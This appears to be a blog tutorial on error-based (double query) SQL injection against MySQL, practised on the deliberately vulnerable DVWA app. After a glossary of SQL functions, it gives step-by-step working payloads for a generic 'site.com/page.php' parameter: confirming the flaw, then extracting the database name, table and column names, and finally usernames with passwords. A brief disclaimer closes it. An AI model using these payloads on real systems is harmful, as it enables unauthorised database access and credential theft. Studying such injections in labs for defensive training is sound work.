Today we can do Error Based Injection for that we can understand some SQL commands like Concat, Rand, As, Group By, Count, Floor.
- concat - joisn 2 or more strings/columns
- group by - groups the data/rows according to the values ina specific columns to do futher calcuations on the grouped data
- floor(x.y) - returns least interger value
- rand( [x] ) - generates random number btw 0-1, if x is given the output will be same for all x
- as - used to give temporary name to a columns in the output of a select command
- count(column/*) - counts the number of NON-NULL rows in a column
Software Used :-
DVWA (Vulnerable Web application) - (Click Here)
FireFox - (Click Here)
Hacker Bar - (Click Here)
ASCII Code :-
NOTE
*** Base Query FOR double query injection***
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (<any SQL query here>)) a from information_schema.tables group by a)b)
Steps :->
Step 1: find dynamic page
site.com/page.php?news=89
Step 2: apply ' to check if wesite gives MySQL error
site.com/page.php?news=89'
You must see an error like:
You have an error in you SQL syntax, check the manual that corresponds... MySQL ......
Step 3: find the injection type
ssite.com/page.php?news=89'--+
- if page opens normally then injection type is string
- if not try removing '
- site.com/page.php?news=89--+
- if works now then injection type is integer
- if still dose not then try ", "), ') etc
- if none works, try another link
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (database())) a from information_schema.tables group by a)b)
Now you will get an error like :-
Duplicate entry '1::dvwa' for key 'group_key'
in place of dvwa you will see the name of your database
Step 5: get the names of the tables (assuming database name is dvwa)
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (select table_name from information_schema.tables where table_schema=database() limit 0,1)) a from information_schema.tables group by a)b)
this will give 1st table, for next table limit 1,1 and similarly for nth -> limit n-1,1
Step 6: get the columns names from the juicy table (assuming table=users) *i use ASCII value or users
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (select column_name from information_schema.columns where table_schema=database() and table_name = char(117,115,101,114,115) limit 0,1)) a from information_schema.tables group by a)b)
Step 7: get the data from the juicy columns (assuming columns=user,password)
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (select concat(user,0x2d2d,password) from dvwa.users limit 3,1) ) a from information_schema.tables group by a)b)
If you like this post then please like our FACEBOOK page and Subscribe our YouTube Channel
NOTE:- Please Do note use this information for bad work. :)
Thanks :) :)
Post a Comment